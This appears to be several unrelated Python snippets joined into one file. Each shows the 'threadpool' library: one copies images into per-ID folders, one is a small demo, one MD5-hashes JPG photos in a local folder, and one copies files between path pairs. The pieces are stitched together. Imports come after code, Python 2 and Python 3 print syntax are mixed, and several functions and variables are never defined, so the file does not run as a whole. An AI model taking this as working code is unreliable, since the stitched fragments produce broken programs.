                id_name = live_cluster_info_id_path.split(path_char)[-1]
                if not os.path.exists(os.path.join(id_clean_result, id_name)):
                    print "mkdir", os.path.join(id_clean_result, id_name)
                    os.mkdir(os.path.join(id_clean_result, id_name))
                cp_list.append([img_path, os.path.join(id_clean_result, id_name, img_name)])
    for i in range(0, len(cp_list)):
        cpfile_A = cp_list[i][0]
        cpfile_B = cp_list[i][1]
        fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None))
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(cp_exec, fun_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
def main():
    l = ['11111', '22222', '33333', '44444', '55555']
    pool = threadpool.ThreadPool(5)  # create a thread pool with 5 worker threads
    requests = threadpool.makeRequests(loop1, l)  # pass in the function and the arguments it needs
    [pool.putRequest(req) for req in requests]  # submit every work request; the pool's workers pick them up and run them
    pool.wait()  # block until all requests in the pool have finished
import time
import random
import threadpool
import hashlib
import os


def get_hash(path):
    file = open(path, 'rb').read()
    md5 = hashlib.md5(file).hexdigest()
    print(path, md5)


def get_queue(path):
    dui_lie = []
    file_stream = os.walk(path, True)
    for dirs in file_stream:
        prepath = dirs[0]
        for k in dirs[2]:
            if '.JPG' in k:
                filename = k
                p = prepath + '/' + filename
                dui_lie.append(p)
    return dui_lie


if __name__ == '__main__':
    duilie = get_queue('/Volumes/qifei/照片汇总')
    pool2 = threadpool.ThreadPool(100)
    for n in threadpool.makeRequests(get_hash, duilie):
        pool2.putRequest(n)
    pool2.wait()
for attr in attrs:
    # if attr in notdealed:
    #     source_url.append(source_addr + attr)
    #     dire_url.append(dire_addr + attr)  # attr[0: attr.index('.')] + r"_ID.txt")
    source_url = []
    source_url.append(source_addr + attr)
    source_url.append(dire_addr + attr)  # attr[0: attr.index('.')] + r"_ID.txt")
    # print(source_url)
    # func.append((source_url, None))
    func.append(source_url)
# print(func)
# exit()

"""Multithreaded version"""
pool = tp.ThreadPool(len(attrs))
requests = tp.makeRequests(job, func)
[pool.putRequest(req) for req in requests]
pool.wait()
# print(source_url[0], dire_url[0])
# exit()
# job(source_url[0], dire_url[0])
# print(source_url)
# exit()
# p1 = mp.Process(target=job, args=(source_url, dire_url,), name='p1')
# p1.start()
# p1.join()
# # print(source_url)
# # print(dire_url)
# # exit()